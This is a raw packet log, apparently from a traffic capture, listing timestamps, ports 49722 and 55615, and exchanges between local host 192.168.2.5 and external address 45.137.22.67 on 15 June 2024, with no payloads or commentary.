Jun 15, 2024 20:22:30.046454906 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.094188929 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.097009897 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.135868073 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.136128902 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.136348009 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141345978 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141374111 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141396999 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141410112 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141422987 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141447067 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141447067 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141478062 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141493082 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141515017 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141516924 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141541004 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141546965 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141565084 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141582966 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141607046 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141611099 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141630888 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141655922 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141679049 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141685009 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141720057 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141727924 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141745090 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141774893 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141799927 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141843081 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141911983 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.141972065 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.141994953 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142026901 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142038107 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142056942 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142066956 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142086983 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142091036 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142117023 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142138958 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142239094 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142262936 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142297983 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142307043 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142330885 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142330885 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142354965 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142358065 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142381907 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142401934 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142412901 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142462969 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142486095 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142510891 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142539024 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142553091 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142560005 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142616034 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142633915 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142638922 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142663002 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142663956 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142687082 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142712116 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142817020 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142841101 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142864943 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142870903 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142894030 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142906904 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142925978 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.142934084 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142957926 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.142983913 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143007040 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143027067 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143050909 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143054008 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143074036 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143081903 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143100977 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143105984 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143124104 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143134117 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143167973 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143178940 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143203974 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143227100 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143232107 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143250942 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143273115 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143274069 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143297911 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143304110 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143337011 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143341064 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143366098 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.143395901 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.143420935 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.146800041 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.146876097 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.146914005 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.146939993 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.146964073 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.146989107 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147025108 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147037029 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147063017 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147069931 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147089005 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147100925 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147114992 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147136927 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147141933 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147162914 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147167921 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147193909 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147213936 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147239923 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147263050 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147274017 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147284031 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147299051 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147320986 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147326946 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147355080 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147373915 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147386074 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147399902 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147432089 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147456884 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147475958 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147525072 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147540092 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147564888 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147589922 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147618055 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147618055 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147686005 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147687912 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147715092 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147744894 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147770882 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147825956 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147850990 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.147890091 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.147917986 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148003101 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148061991 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148255110 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148281097 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148329020 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148420095 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148446083 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148475885 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148530960 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148626089 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148694992 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148767948 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148798943 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148828030 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148828030 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148855925 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148857117 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148884058 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148888111 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148910999 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148933887 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148962021 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.148962021 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.148993015 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149018049 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149019957 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149046898 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149071932 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149074078 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149099112 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149101019 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149126053 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149142981 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149152994 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149174929 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149178982 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149202108 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149224997 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149234056 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149261951 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149283886 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149287939 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149312019 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149313927 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149339914 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149339914 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149365902 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149367094 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149394035 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149399996 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149421930 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149422884 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149446964 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149477959 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149502039 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149506092 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149529934 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149533033 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149555922 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149559975 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149579048 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149590969 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149606943 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149617910 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149669886 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149682999 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149697065 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149724007 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149750948 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149751902 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149796009 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149797916 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149823904 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149849892 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149851084 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149878025 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149897099 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149903059 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149924040 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149943113 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149950027 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.149969101 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.149982929 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150002003 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150010109 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150027990 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150036097 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150053978 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150079966 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150085926 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150113106 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150137901 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150139093 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150166035 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150167942 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150212049 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150238991 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150249958 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150264025 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150289059 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150290966 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150316954 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150325060 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150342941 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150357008 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150368929 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150383949 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150408983 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150417089 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150443077 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150468111 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150480986 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150496960 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150522947 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150523901 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150546074 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150549889 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150572062 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150597095 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150604963 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150624990 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150650978 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150676966 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150685072 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150702953 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150729895 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150731087 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150754929 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150767088 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150787115 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.150795937 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.150840044 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.151493073 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.151523113 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.151550055 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.151551008 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.151576042 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.151580095 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.151607037 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.151623011 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.151635885 CEST	49722	55615	192.168.2.5	45.137.22.67
Jun 15, 2024 20:22:30.153611898 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.153836966 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154150009 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154176950 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154202938 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154230118 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154275894 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154301882 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154329062 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154355049 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154383898 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154474974 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154501915 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154527903 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154624939 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154652119 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154681921 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154707909 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154733896 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154759884 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154784918 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154810905 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154858112 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154884100 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154930115 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154956102 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.154982090 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.155006886 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.155033112 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.155126095 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.155152082 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.155178070 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.155204058 CEST	55615	49722	45.137.22.67	192.168.2.5
Jun 15, 2024 20:22:30.155230999 CEST	55615	49722	45.137.22.67	192.168.2.5
